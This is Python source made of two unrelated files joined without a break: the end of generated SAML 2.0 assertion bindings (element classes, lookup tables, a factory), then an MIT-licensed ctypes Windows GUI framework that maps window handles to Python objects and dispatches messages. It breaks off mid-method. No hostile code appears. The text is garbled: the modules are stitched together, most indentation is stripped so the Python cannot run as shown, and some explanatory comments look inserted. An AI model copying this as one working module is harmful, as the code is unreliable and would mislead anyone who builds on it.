return saml2.create_class_from_xml_string(SubjectType_, xml_string)
class Conditions(ConditionsType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Conditions element """
c_tag = 'Conditions'
c_namespace = NAMESPACE
c_children = ConditionsType_.c_children.copy()
c_attributes = ConditionsType_.c_attributes.copy()
c_child_order = ConditionsType_.c_child_order[:]
c_cardinality = ConditionsType_.c_cardinality.copy()
def conditions_from_string(xml_string):
return saml2.create_class_from_xml_string(Conditions, xml_string)
class AuthnStatement(AuthnStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatement element """
c_tag = 'AuthnStatement'
c_namespace = NAMESPACE
c_children = AuthnStatementType_.c_children.copy()
c_attributes = AuthnStatementType_.c_attributes.copy()
c_child_order = AuthnStatementType_.c_child_order[:]
c_cardinality = AuthnStatementType_.c_cardinality.copy()
def authn_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnStatement, xml_string)
class AttributeStatement(AttributeStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatement element """
c_tag = 'AttributeStatement'
c_namespace = NAMESPACE
c_children = AttributeStatementType_.c_children.copy()
c_attributes = AttributeStatementType_.c_attributes.copy()
c_child_order = AttributeStatementType_.c_child_order[:]
c_cardinality = AttributeStatementType_.c_cardinality.copy()
def attribute_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeStatement, xml_string)
class Subject(SubjectType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Subject element """
c_tag = 'Subject'
c_namespace = NAMESPACE
c_children = SubjectType_.c_children.copy()
c_attributes = SubjectType_.c_attributes.copy()
c_child_order = SubjectType_.c_child_order[:]
c_cardinality = SubjectType_.c_cardinality.copy()
def subject_from_string(xml_string):
return saml2.create_class_from_xml_string(Subject, xml_string)
#..................
# ['AuthzDecisionStatement', 'EvidenceType', 'AdviceType', 'Evidence',
# 'Assertion', 'AssertionType', 'AuthzDecisionStatementType', 'Advice']
class EvidenceType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EvidenceType element """
c_tag = 'EvidenceType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = (
'assertion_id_ref', [AssertionIDRef])
c_cardinality['assertion_id_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = (
'assertion_uri_ref', [AssertionURIRef])
c_cardinality['assertion_uri_ref'] = {"min": 0}
c_cardinality['assertion'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = (
'encrypted_assertion', [EncryptedAssertion])
c_cardinality['encrypted_assertion'] = {"min": 0}
c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion',
'encrypted_assertion'])
def __init__(self,
assertion_id_ref=None,
assertion_uri_ref=None,
assertion=None,
encrypted_assertion=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.assertion_id_ref = assertion_id_ref or []
self.assertion_uri_ref = assertion_uri_ref or []
self.assertion = assertion or []
self.encrypted_assertion = encrypted_assertion or []
def evidence_type__from_string(xml_string):
return saml2.create_class_from_xml_string(EvidenceType_, xml_string)
class Evidence(EvidenceType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Evidence element """
c_tag = 'Evidence'
c_namespace = NAMESPACE
c_children = EvidenceType_.c_children.copy()
c_attributes = EvidenceType_.c_attributes.copy()
c_child_order = EvidenceType_.c_child_order[:]
c_cardinality = EvidenceType_.c_cardinality.copy()
def evidence_from_string(xml_string):
return saml2.create_class_from_xml_string(Evidence, xml_string)
class AuthzDecisionStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatementType
element """
c_tag = 'AuthzDecisionStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Action'] = (
'action', [Action])
c_cardinality['action'] = {"min": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Evidence'] = (
'evidence', Evidence)
c_cardinality['evidence'] = {"min": 0, "max": 1}
c_attributes['Resource'] = ('resource', 'anyURI', True)
c_attributes['Decision'] = ('decision', DecisionType_, True)
c_child_order.extend(['action', 'evidence'])
def __init__(self,
action=None,
evidence=None,
resource=None,
decision=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.action = action or []
self.evidence = evidence
self.resource = resource
self.decision = decision
def authz_decision_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthzDecisionStatementType_,
xml_string)
class AuthzDecisionStatement(AuthzDecisionStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatement
element """
c_tag = 'AuthzDecisionStatement'
c_namespace = NAMESPACE
c_children = AuthzDecisionStatementType_.c_children.copy()
c_attributes = AuthzDecisionStatementType_.c_attributes.copy()
c_child_order = AuthzDecisionStatementType_.c_child_order[:]
c_cardinality = AuthzDecisionStatementType_.c_cardinality.copy()
def authz_decision_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthzDecisionStatement,
xml_string)
#..................
# ['Assertion', 'AssertionType', 'AdviceType', 'Advice']
class AssertionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionType element """
c_tag = 'AssertionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Issuer'] = ('issuer',
Issuer)
c_children['{http://www.w3.org/2000/09/xmldsig#}Signature'] = ('signature',
ds.Signature)
c_cardinality['signature'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Subject'] = ('subject',
Subject)
c_cardinality['subject'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'] = (
'conditions', Conditions)
c_cardinality['conditions'] = {"min": 0, "max": 1}
c_cardinality['advice'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Statement'] = (
'statement', [Statement])
c_cardinality['statement'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement'] = (
'authn_statement', [AuthnStatement])
c_cardinality['authn_statement'] = {"min": 0}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthzDecisionStatement'] = (
'authz_decision_statement', [AuthzDecisionStatement])
c_cardinality['authz_decision_statement'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement'] = (
'attribute_statement', [AttributeStatement])
c_cardinality['attribute_statement'] = {"min": 0}
c_attributes['Version'] = ('version', 'string', True)
c_attributes['ID'] = ('id', 'ID', True)
c_attributes['IssueInstant'] = ('issue_instant', 'dateTime', True)
c_child_order.extend(['issuer', 'signature', 'subject', 'conditions',
'advice', 'statement', 'authn_statement',
'authz_decision_statement', 'attribute_statement'])
def __init__(self,
issuer=None,
signature=None,
subject=None,
conditions=None,
advice=None,
statement=None,
authn_statement=None,
authz_decision_statement=None,
attribute_statement=None,
version=None,
id=None,
issue_instant=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.issuer = issuer
self.signature = signature
self.subject = subject
self.conditions = conditions
self.advice = advice
self.statement = statement or []
self.authn_statement = authn_statement or []
self.authz_decision_statement = authz_decision_statement or []
self.attribute_statement = attribute_statement or []
self.version = version
self.id = id
self.issue_instant = issue_instant
def verify(self):
        # an assertion that contains no statements MUST contain a Subject element
if self.attribute_statement or self.statement or \
self.authn_statement or self.authz_decision_statement:
pass
elif not self.subject:
raise MustValueError(
"If no statement MUST contain a subject element")
if self.authn_statement and not self.subject:
raise MustValueError(
"An assertion with an AuthnStatement must contain a Subject")
return SamlBase.verify(self)
def assertion_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionType_, xml_string)
class Assertion(AssertionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Assertion element """
c_tag = 'Assertion'
c_namespace = NAMESPACE
c_children = AssertionType_.c_children.copy()
c_attributes = AssertionType_.c_attributes.copy()
c_child_order = AssertionType_.c_child_order[:]
c_cardinality = AssertionType_.c_cardinality.copy()
def assertion_from_string(xml_string):
return saml2.create_class_from_xml_string(Assertion, xml_string)
class AdviceType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AdviceType element """
c_tag = 'AdviceType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = (
'assertion_id_ref', [AssertionIDRef])
c_cardinality['assertion_id_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = (
'assertion_uri_ref', [AssertionURIRef])
c_cardinality['assertion_uri_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
c_cardinality['assertion'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = (
'encrypted_assertion', [EncryptedAssertion])
c_cardinality['encrypted_assertion'] = {"min": 0}
c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion',
'encrypted_assertion'])
c_any = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
assertion_id_ref=None,
assertion_uri_ref=None,
assertion=None,
encrypted_assertion=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.assertion_id_ref = assertion_id_ref or []
self.assertion_uri_ref = assertion_uri_ref or []
self.assertion = assertion or []
self.encrypted_assertion = encrypted_assertion or []
def advice_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AdviceType_, xml_string)
class Advice(AdviceType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Advice element """
c_tag = 'Advice'
c_namespace = NAMESPACE
c_children = AdviceType_.c_children.copy()
c_attributes = AdviceType_.c_attributes.copy()
c_child_order = AdviceType_.c_child_order[:]
c_cardinality = AdviceType_.c_cardinality.copy()
def advice_from_string(xml_string):
return saml2.create_class_from_xml_string(Advice, xml_string)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
EvidenceType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
Evidence.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
AssertionType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = (
'advice', Advice)
Assertion.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = (
'advice', Advice)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
AG_IDNameQualifiers = [
('NameQualifier', 'string', False),
('SPNameQualifier', 'string', False),
]
ELEMENT_FROM_STRING = {
BaseID.c_tag: base_id_from_string,
NameID.c_tag: name_id_from_string,
NameIDType_.c_tag: name_id_type__from_string,
EncryptedElementType_.c_tag: encrypted_element_type__from_string,
EncryptedID.c_tag: encrypted_id_from_string,
Issuer.c_tag: issuer_from_string,
AssertionIDRef.c_tag: assertion_id_ref_from_string,
AssertionURIRef.c_tag: assertion_uri_ref_from_string,
Assertion.c_tag: assertion_from_string,
AssertionType_.c_tag: assertion_type__from_string,
Subject.c_tag: subject_from_string,
SubjectType_.c_tag: subject_type__from_string,
SubjectConfirmation.c_tag: subject_confirmation_from_string,
SubjectConfirmationType_.c_tag: subject_confirmation_type__from_string,
SubjectConfirmationData.c_tag: subject_confirmation_data_from_string,
SubjectConfirmationDataType_.c_tag:
subject_confirmation_data_type__from_string,
KeyInfoConfirmationDataType_.c_tag:
key_info_confirmation_data_type__from_string,
Conditions.c_tag: conditions_from_string,
ConditionsType_.c_tag: conditions_type__from_string,
Condition.c_tag: condition_from_string,
AudienceRestriction.c_tag: audience_restriction_from_string,
AudienceRestrictionType_.c_tag: audience_restriction_type__from_string,
Audience.c_tag: audience_from_string,
OneTimeUse.c_tag: one_time_use_from_string,
OneTimeUseType_.c_tag: one_time_use_type__from_string,
ProxyRestriction.c_tag: proxy_restriction_from_string,
ProxyRestrictionType_.c_tag: proxy_restriction_type__from_string,
Advice.c_tag: advice_from_string,
AdviceType_.c_tag: advice_type__from_string,
EncryptedAssertion.c_tag: encrypted_assertion_from_string,
Statement.c_tag: statement_from_string,
AuthnStatement.c_tag: authn_statement_from_string,
AuthnStatementType_.c_tag: authn_statement_type__from_string,
SubjectLocality.c_tag: subject_locality_from_string,
SubjectLocalityType_.c_tag: subject_locality_type__from_string,
AuthnContext.c_tag: authn_context_from_string,
AuthnContextType_.c_tag: authn_context_type__from_string,
AuthnContextClassRef.c_tag: authn_context_class_ref_from_string,
AuthnContextDeclRef.c_tag: authn_context_decl_ref_from_string,
AuthnContextDecl.c_tag: authn_context_decl_from_string,
AuthenticatingAuthority.c_tag: authenticating_authority_from_string,
AuthzDecisionStatement.c_tag: authz_decision_statement_from_string,
AuthzDecisionStatementType_.c_tag:
authz_decision_statement_type__from_string,
DecisionType_.c_tag: decision_type__from_string,
Action.c_tag: action_from_string,
ActionType_.c_tag: action_type__from_string,
Evidence.c_tag: evidence_from_string,
EvidenceType_.c_tag: evidence_type__from_string,
AttributeStatement.c_tag: attribute_statement_from_string,
AttributeStatementType_.c_tag: attribute_statement_type__from_string,
Attribute.c_tag: attribute_from_string,
AttributeType_.c_tag: attribute_type__from_string,
AttributeValue.c_tag: attribute_value_from_string,
EncryptedAttribute.c_tag: encrypted_attribute_from_string,
}
ELEMENT_BY_TAG = {
'BaseID': BaseID,
'NameID': NameID,
'NameIDType': NameIDType_,
'EncryptedElementType': EncryptedElementType_,
'EncryptedID': EncryptedID,
'Issuer': Issuer,
'AssertionIDRef': AssertionIDRef,
'AssertionURIRef': AssertionURIRef,
'Assertion': Assertion,
'AssertionType': AssertionType_,
'Subject': Subject,
'SubjectType': SubjectType_,
'SubjectConfirmation': SubjectConfirmation,
'SubjectConfirmationType': SubjectConfirmationType_,
'SubjectConfirmationData': SubjectConfirmationData,
'SubjectConfirmationDataType': SubjectConfirmationDataType_,
'KeyInfoConfirmationDataType': KeyInfoConfirmationDataType_,
'Conditions': Conditions,
'ConditionsType': ConditionsType_,
'Condition': Condition,
'AudienceRestriction': AudienceRestriction,
'AudienceRestrictionType': AudienceRestrictionType_,
'Audience': Audience,
'OneTimeUse': OneTimeUse,
'OneTimeUseType': OneTimeUseType_,
'ProxyRestriction': ProxyRestriction,
'ProxyRestrictionType': ProxyRestrictionType_,
'Advice': Advice,
'AdviceType': AdviceType_,
'EncryptedAssertion': EncryptedAssertion,
'Statement': Statement,
'AuthnStatement': AuthnStatement,
'AuthnStatementType': AuthnStatementType_,
'SubjectLocality': SubjectLocality,
'SubjectLocalityType': SubjectLocalityType_,
'AuthnContext': AuthnContext,
'AuthnContextType': AuthnContextType_,
'AuthnContextClassRef': AuthnContextClassRef,
'AuthnContextDeclRef': AuthnContextDeclRef,
'AuthnContextDecl': AuthnContextDecl,
'AuthenticatingAuthority': AuthenticatingAuthority,
'AuthzDecisionStatement': AuthzDecisionStatement,
'AuthzDecisionStatementType': AuthzDecisionStatementType_,
'DecisionType': DecisionType_,
'Action': Action,
'ActionType': ActionType_,
'Evidence': Evidence,
'EvidenceType': EvidenceType_,
'AttributeStatement': AttributeStatement,
'AttributeStatementType': AttributeStatementType_,
'Attribute': Attribute,
'AttributeType': AttributeType_,
'AttributeValue': AttributeValue,
'EncryptedAttribute': EncryptedAttribute,
'BaseIDAbstractType': BaseIDAbstractType_,
'ConditionAbstractType': ConditionAbstractType_,
'StatementAbstractType': StatementAbstractType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
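# Illustrative usage sketch (comment only, not part of the generated bindings):
# factory() looks the element tag up in ELEMENT_BY_TAG and forwards keyword
# arguments to that class' __init__, e.g. (keyword names follow the __init__
# signatures defined above; NameID(text=...) is assumed to behave like the
# other SamlBase subclasses):
#     attr = factory('Attribute', name='urn:oid:2.5.4.3', friendly_name='cn')
#     subject = factory('Subject', name_id=factory('NameID', text='alice'))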
## Copyright (c) 2003 Henk Punt
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the
## "Software"), to deal in the Software without restriction, including
## without limitation the rights to use, copy, modify, merge, publish,
## distribute, sublicense, and/or sell copies of the Software, and to
## permit persons to whom the Software is furnished to do so, subject to
## the following conditions:
## The above copyright notice and this permission notice shall be
## included in all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
from .windows import *
from ctypes import *
from .winuser import MAKEINTRESOURCE, LoadIcon, LoadCursor
import sys
import weakref
quit = False
class HandleMap(dict):
"""a special weakreference map for mapping window handles to python instances
when a python instance becomes garbage, the __dispose__ method of HandleMap
is called, deleting the handle from the map and freeing OS resources by calling
the method stored in the __dispose__ variable of the garbage python instance.
This latter method should be bound to a windows-free-routine corresponding to the
type of the handle"""
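    # Illustrative sketch (assumption, not original code): storing a managed
    # object keeps only a weak reference; once the object is collected the
    # weakref callback invokes __dispose__, which drops the map entry and calls
    # the object's __dispose__ routine on the raw handle:
    #     hndlMap[hwnd] = win     # hwnd/win are hypothetical
    #     del win                 # -> e.g. DestroyWindow(hwnd) once collected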
    def freeze_method(self, handle, fndisp, dbgstr):
        # unused alternative to the lambda in __setitem__ below; the handle must
        # be passed in explicitly so the weakref callback can locate the entry
        def freeze_func(wref=0, handle=handle, fndisp=fndisp, dbgstr=dbgstr):
            self.__dispose__(handle, wref, fndisp, dbgstr)
        return freeze_func
def __setitem__(self, handle, value):
# watch the lambda closure, freezing the binding of:
# - fndisp to the __dispose__ variable of the value object
# - handle to the provided windows-handle in the first actual parameter
lmdisp = lambda wr, fndisp = value.__dispose__, dbgstr = str(value.__class__): self.__dispose__(handle, wr, fndisp, dbgstr)
        #lmdisp = self.freeze_method(handle, value.__dispose__, str(value.__class__))
dict.__setitem__(self, handle, weakref.ref(value, lmdisp))
def __getitem__(self, handle):
return dict.__getitem__(self, handle)() # weak refs are 'called' to return the referred object
def get(self, k, d = None):
#~ if self.has_key(k):
if k in self:
return self[k]
else:
return d
def __dispose__(self, handle, wr, fndisp, dbgstr): # callback of weakref wr, called when wr() is garbage
global quit
self.__delitem__(handle)
if not quit:
try:
fndisp(handle)
except:
                print('ERROR HandleMap %d, %s, %s, %s' % (handle, repr(wr), repr(fndisp), dbgstr))
hndlMap = HandleMap() #contains the mapping from python instances (of Window) to windows HANDLES
createHndlMap = {} #used while handling messages during CreateWindow(Ex)
def globalWndProc(hWnd, nMsg, wParam, lParam):
"""The purpose of globalWndProc is route messages coming in on the global queue
to the appropriate python Window instance for handling.
Also it establishes the mapping from python instances to window HANDLES by processing the WM_NCCREATE message
"""
try:
if nMsg == WM_NCCREATE:
            #a venster window is being created through CreateWindowEx,
#establish the mapping between the windows HANDLE and the Window instance
#the window instance is to be found in the createHndlMap by looking up
#the key that was given as a parameter to CreateWindowEx
#~ print createHndlMap
createStruct = CREATESTRUCT.from_address(int(lParam))
#~ window = createHndlMap.get(int(createStruct.lpCreateParams), None)
window = createHndlMap.get(createStruct.lpCreateParams, None)
#~ window = createHndlMap.get(cast(lParam, POINTER(CREATESTRUCT)).lpCreateParams, None)
if window:
#it is a venster window being created, establish the mapping:
WindowsObject.__init__(window, hWnd)
handled = False
result = None
window = hndlMap.get(hWnd, None)
if window:
#this is a known venster window, let the window process its own msgs
handled, result = window.WndProc(hWnd, nMsg, wParam, lParam)
if not handled and window._issubclassed_:
                #it's a subclassed window, try old window proc
result = CallWindowProc(window._old_wnd_proc_, hWnd, nMsg, wParam, lParam)
handled = True #always handled, either by old window proc, or old window proc called default handling
if not handled:
#still not handled, perform default processing
try:
return DefWindowProc(hWnd, nMsg, wParam, lParam) #windows default processing
except:
                print('ERROR perform default processing: DefWindowProc(%d, %d, %d, %d)' % (hWnd, nMsg, wParam, lParam))
else:
return result
except:
try:
import traceback
traceback.print_exc()
except:
            pass #this happens when the python runtime is already exiting, but we are still registered
#as a window proc and windows keeps calling the callback
cGlobalWndProc = WNDPROC(globalWndProc)
def handle(obj):
if not obj:
return NULL
elif hasattr(obj, 'handle'):
return obj.handle
else:
return obj
def instanceFromHandle(handle):
return hndlMap.get(handle, None)
def instanceOrHandle(handle):
return hndlMap.get(handle, handle)
def windowFromHandle(handle):
"""returns None if handle = 0, the python Window instance if
handle is known, or a new pseudo window if handle != 0 and not known"""
if not handle:
return None
window = hndlMap.get(handle, None)
if not window:
window = Window(hWnd = handle)
return window
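# Illustrative sketch (assumption): wrapping a foreign HWND yields an unmanaged
# pseudo Window that is not stored in hndlMap and is never destroyed by venster:
#     w = windowFromHandle(some_hwnd)   # some_hwnd is a hypothetical raw handle
#     w.handle == some_hwnd             # -> True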
class WindowsObject(object):
m_handle = 0
def __init__(self, handle, managed = True):
"""managed objects are stored in a global map so that they can
be looked up by their handle, also this allows for calling the
appropriate destructor function (__dispose__) whenever the object
becomes garbage"""
self.m_handle = handle
if managed:
hndlMap[handle] = self
handle = property(lambda self: self.m_handle)
def __str__(self):
return '<%s handle: %d>' % (self.__class__.__name__, self.handle)
    def __eq__(self, other):
        return isinstance(other, WindowsObject) and self.handle == other.handle
    def __hash__(self):
        return hash(self.handle)
class Event(object):
def __init__(self, hWnd, nMsg, wParam, lParam):
self.hWnd = hWnd
self.nMsg = nMsg
self.lParam = lParam
self.wParam = wParam
self.handled = 0
def structure(self, nmStructure):
return nmStructure.from_address(int(self.lParam))
def __str__(self):
return "<event hWnd: %d, nMsg: %d, lParam: %d, wParam: %d>" % (self.hWnd, self.nMsg, self.lParam, self.wParam)
class MSG_MAP(list):
def __init__(self, entries):
list.__init__(self, entries)
self._msg_map_ = {}
for entry in self:
self.append(entry)
    def append(self, entry):
        #note: the entry is not added to the underlying list here; __install__
        #registers it in the _msg_map_ dict (keyed by message, command id or
        #notification code)
        entry.__install__(self)
def Handle(self, receiver, hWnd, nMsg, wParam, lParam, clazz):
handler = self._msg_map_.get(nMsg, None)
if handler:
event = Event(hWnd, nMsg, wParam, lParam)
event.handled = True #the presence of a handler means that by default we assume the event to be handled
#if the handler wants to force further processing by parent class map
#the handler will set event.handled to False
result = handler(receiver, event)
if event.handled:
if result == None:
return (True, NULL)
else:
return (True, int(result))
return (False, NULL)
def HandleBaseClasses(self, receiver, hWnd, nMsg, wParam, lParam, clazz):
for baseClass in clazz.__bases__:
if issubclass(baseClass, Window):
handled, result = baseClass._msg_map_.Dispatch(receiver, hWnd, nMsg, wParam, lParam, baseClass)
if handled:
return (True, result)
return (False, NULL)
def Dispatch(self, receiver, hWnd, nMsg, wParam, lParam, clazz = None):
clazz = clazz or receiver.__class__
handled, result = self.Handle(receiver, hWnd, nMsg, wParam, lParam, clazz)
if handled:
return (True, result)
handled, result = self.HandleBaseClasses(receiver, hWnd, nMsg, wParam, lParam, clazz)
if handled:
return (True, result)
#nobody handled msg
return (False, NULL)
def DispatchMSG(self, receiver, msg):
return self.Dispatch(receiver, msg.hWnd, msg.message, msg.wParam, msg.lParam)
def __str__(self):
return str(self._msg_map_)
class WindowType(type):
def __init__(cls, name, bases, dct):
#make sure every window class has its own msg map
#~ if not dct.has_key('_msg_map_'):
if not '_msg_map_' in dct:
cls._msg_map_ = MSG_MAP([])
super(WindowType, cls).__init__(name, bases, dct)
#see if decorators were used to map events to handlers,
#and install the handlers in the msgmap
for item in list(dct.values()):
if hasattr(item, 'handler'):
cls._msg_map_.append(item.handler)
hInstance = GetModuleHandle(None)
wndClasses = []
RCDEFAULT = RECT(top = CW_USEDEFAULT, left = CW_USEDEFAULT, right = 0, bottom = 0)
class Window(WindowsObject, metaclass=WindowType):
_window_class_ = ''
_window_title_ = ''
_window_style_ = WS_OVERLAPPEDWINDOW | WS_VISIBLE
_window_style_ex_ = 0
_window_icon_ = LoadIcon(NULL, MAKEINTRESOURCE(IDI_APPLICATION))
_window_icon_sm_ = LoadIcon(NULL, MAKEINTRESOURCE(IDI_APPLICATION))
_window_background_ = 0
_window_class_style_ = 0
_window_style_clip_children_and_siblings_ = True
_window_dbg_msg_ = False
_window_width_ = CW_USEDEFAULT
_window_height_ = CW_USEDEFAULT
__dispose__ = DestroyWindow
def __init__(self, title = '', style = None, exStyle = None, parent = None, menu = None, rcPos = RCDEFAULT, orStyle = None, orExStyle = None, nandStyle = None, nandExStyle = None, width = CW_USEDEFAULT, height = CW_USEDEFAULT, hWnd = None):
if hWnd: #wrapping instead of creating
self.m_handle = hWnd #note client is responsible for deleting
return
windowClassExists = False
cls = WNDCLASSEX()
if self._window_class_:
if GetClassInfo(hInstance, self._window_class_, byref(cls)):
windowClassExists = True
#determine whether we are going to subclass an existing window class
#or create a new windowclass
self._issubclassed_ = self._window_class_ and windowClassExists
atom = 0
if not self._issubclassed_:
#if no _window_class_ is given, generate a new one
className = self._window_class_ or "venster_wtl_%d" % id(self.__class__)
cls = WNDCLASSEX()
cls.cbSize = sizeof(cls)
cls.lpszClassName = className
cls.hInstance = hInstance
cls.lpfnWndProc = cGlobalWndProc
cls.style = self._window_class_style_
cls.hbrBackground = self._window_background_
cls.hIcon = handle(self._window_icon_)
cls.hIconSm = handle(self._window_icon_sm_)
cls.hCursor = LoadCursor(NULL, MAKEINTRESOURCE(IDC_ARROW))
#cls structure needs to stay on heap
wndClasses.append(cls)
atom = RegisterClassEx(pointer(cls))
#~ print('atom %d' % atom)
else:
#subclass existing window class.
className = self._window_class_
title = title or self._window_title_
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if self._window_style_clip_children_and_siblings_:
style |= WS_CLIPCHILDREN
style |= WS_CLIPSIBLINGS
if nandStyle:
style &= ~nandStyle
left, right = rcPos.left, rcPos.right
top, bottom = rcPos.top, rcPos.bottom
if width == CW_USEDEFAULT:
width = self._window_width_
if left == CW_USEDEFAULT and width != CW_USEDEFAULT:
right = CW_USEDEFAULT + width
if height == CW_USEDEFAULT:
height = self._window_height_
if top == CW_USEDEFAULT and height != CW_USEDEFAULT:
bottom = CW_USEDEFAULT + height
        #for normal windows created through venster, the mapping between window handle
        #and window instance will be established by processing the WM_NCCREATE msg
        #and looking up the instance in createHndlMap
createHndlMap[id(self)] = self
wm_create_param = id(self)
if className == 'msctls_trackbar32':
wm_create_param = 0
hWnd = 0
if atom:
hWnd = CreateWindowEx_atom(exStyle, atom, title, style, left, top, right - left, bottom - top, handle(parent), handle(menu), hInstance, wm_create_param)
else:
hWnd = CreateWindowEx(exStyle, className, title, style, left, top, right - left, bottom - top, handle(parent), handle(menu), hInstance, wm_create_param)
del createHndlMap[id(self)]
if self._issubclassed_:
#for subclassed windows, we establish the instance <-> handle mapping here
WindowsObject.__init__(self, hWnd)
self._old_wnd_proc_ = self.SubClass(cGlobalWndProc)
def SubClass(self, newWndProc):
return SetWindowLong(self.handle, GWL_WNDPROC, newWndProc)
class Interceptor(object):
def __init__(self, receiver, window, msg_map, nMsg = [WM_NOTIFY]):
self.nMsg = dict([(x, 1) for x in nMsg])
self.newProc = WNDPROC(self.WndProc)
if window:
self.oldProc = window.SubClass(self.newProc)
self._msg_map_ = msg_map
self.receiver = receiver
def dispose(self):
            self.WndProc = lambda hWnd, nMsg, wParam, lParam: 0
del self.receiver
del self._msg_map_
del self.newProc
def WndProc(self, hWnd, nMsg, wParam, lParam):
if nMsg in self.nMsg and hasattr(self, 'receiver'):
handled, res = self._msg_map_.Dispatch(self.receiver, hWnd, nMsg, wParam, lParam)
else:
handled = 0
if not handled:
return CallWindowProc(self.oldProc, hWnd, nMsg, wParam, lParam)
else:
return res
def Intercept(self, receiver, msgMap, nMsg = [WM_NOTIFY]):
return Window.Interceptor(self, receiver, msgMap, nMsg = nMsg)
def InterceptParent(self, nMsg = [WM_NOTIFY]):
"""intercepts msg proc in order to reroute msgs to self"""
self._interceptParent = self.Intercept(self.GetParent(), self._msg_map_, nMsg = nMsg)
def dispose(self):
if hasattr(self, '_interceptParent'):
self._interceptParent.dispose()
del self._interceptParent
def WndProc(self, hWnd, nMsg, wParam, lParam):
if self._window_dbg_msg_:
